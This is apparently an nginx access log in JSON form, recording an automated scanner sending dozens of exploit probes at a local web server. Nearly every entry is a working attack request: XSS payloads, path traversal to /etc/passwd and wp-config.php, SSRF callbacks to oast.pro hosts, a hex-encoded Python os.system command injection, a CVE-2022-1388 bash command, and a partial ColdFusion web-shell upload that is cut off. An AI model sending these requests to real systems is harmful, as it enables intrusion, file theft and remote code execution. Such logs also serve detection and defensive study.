+{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/admin/master/console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /e/ViewImg/index.html?url=javascript:alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/privatekey.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\x5C&refurl=}}};alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/45 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/users/admin/check HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/docs/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/bc/icf/logoff?redirecturl=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/external/7.0/system.System.get_infos HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_notes/dwsync.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/robomongo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/out HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"fldr=&url=file:///etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /filemanager/upload.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /external_content/retrieve/oembed?endpoint=http://ca2tuc8smpv1g2s80ca03fr1npsoojzbg.oast.pro&url=foo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/46 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sqlite/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"imgSrc=a","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /getcfg.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/3 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"{\x0D\x0A \x22command\x22: \x22run\x22,\x0D\x0A \x22utilCmdArgs\x22: \x22-c 'echo CVE-2022-1388 | rev'\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mgmt/tm/util/bash HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/sharelinks/1.0/link?url=https://ca2tuc8smpv1g2s80ca0j69d4cws49bqn.oast.pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /control/stream?contentId=%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /robomongo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('29N5EthAevkB2hQ0IjlieJ1TcoK')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-login_scr.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/test/test.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/47 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /final/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sqlitemanager/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/admin/users?username=anonymous HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:07 +0000","request_body":"imgSrc=\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A
Command:value=\x22#form.cmd#\x22>
Options: value=\x22#form.opts#\x22>
Timeout: value=\x22#form.timeout#\x22\x0D\x0A value=\x225\x22>
\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A
\x0D\x0A#HTMLCodeFormat(myVar)#\x0D\x0A
\x0D\x0A
